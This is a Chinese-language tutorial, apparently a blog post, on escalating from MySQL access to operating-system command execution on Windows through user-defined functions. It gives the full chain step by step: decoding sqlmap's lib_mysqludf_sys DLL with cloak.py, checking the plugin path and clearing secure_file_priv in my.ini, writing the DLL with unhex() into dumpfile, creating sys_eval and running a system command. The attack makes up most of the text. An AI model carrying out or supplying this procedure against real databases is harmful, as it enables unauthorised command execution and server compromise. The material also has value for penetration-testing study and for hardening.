windwos下mysql的udf提权

MySql UDF提权介绍

UDF(User Defined Functions)即用户自定义函数，通过这种方式可以实现命令执行，其原理是通过lib_mysqludf_sys提供的函数可以执行系统命令 攻击场景:同之前利用日志写WebShell的场景，即堆叠注入或MySQL终端权限或类似phpMyAdmin数据库管理工具后台权限等

UDF的几个关键函数

sys_eval():执行任意命令，并将输出返回

sys_exec():执行任意命令，并将返回码返回

sys_get():获取一个环境变量

sys set():创建或修改一个环境变量

UDF文件获取的方式

https://github.com/mysqludf/lib_mysqludf_sys

sqlmap工具中的UDF文件

sqlmap下：GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool

sqlmap中的UDF文件位于sqlmap/data/udf/mysqI/目录中，该文件经过编码，需要使用sqlmap/extra/cloak目录下的cloak.py文件进行解码

liunx:

python cloak.py -d -i ../../data/udf/mysql/linux/64/lib_mysqludf_sys.so_ -o lib_mysqludf_sys.so

windwos:

python cloak.py -d -i ../../data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ -o lib_mysqludf_sys.dll

dumpfile语法

dumpfile:功能、语法及限制同outfile，但一次只导出一行内容

基本语法: select[列名] from table [where语句] intodumpfile '目标文件'[option];

两者区别

outfile可导出多行数据，而dumpfile只导出一行outfile在将数据写到文件里时有特殊的格式转换，而dumpfile则保持原数据格式

查看路径

用phpstudy的Extensions\MySQL5.7.26\bin\mysql.exe客户端程序，通过获取代的账号密码登录mysql服务端

查看mysql服务器公共库路径

show variables like 'plugin%';        

查看secure_file_priv值是否为空

show global variables like 'secure%'; 

去查看它的设置，发现设置为NULL，secure_file_priv为NULL是禁止导出文件的意思。怪不得无法导出十六进制，那我们就去设置一下吧。我们把secure_file_priv设置为secure_file_priv=

那么我们可以通过修改my.ini去设置secure_file_priv 。

查看mysql安装路径

select @@basedir;

然后访问这个地址，拿到my.ini

然后我们打开my.ini（以记事本方式打开即可）

添加下面标红的语句，保存退出。

secure_file_priv=

然后再查看一下，发现secure_file_priv已经改过来了

确定平台是64位还是32位

show variables like '%version_%';

将udf.dll写入到plugin目录下

先在Mysql根目录中国新建lib\plugin的子目录，再往mysql的plugin目录中写UDF文件

select unhex('xxx') into dumpfile 'D:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin/lib_mysqludf_sys.dll';

注意: unhex()函数值就是UDF文件的Hex值，在Linux下可以使用hexdump命令获取，在Windows下使用WinHex可以获取得到 利用dumpfile才能将原文件数据原封不动地写到指定文件中

WinHex

WinHex是一款16进制的文本编辑器与磁盘编辑软件。可以进行Hex和ASCII编码的编辑与修改，支持多文件搜寻替换功能模式，一般运算和逻辑运算,磁盘磁区的编辑，文件比对和分析功能 下载地址: 【WinHex下载】2024年最新官方正式版WinHex 免费下载 - 腾讯软件中心官网 这里用WinHex打开获取lib_mysqludf_sys.dll文件Hex数据

名字执行

创建函数

create function sys_eval returns string soname 'lib_mysqludf_sys.dll';

执行

select sys_eval("whoami");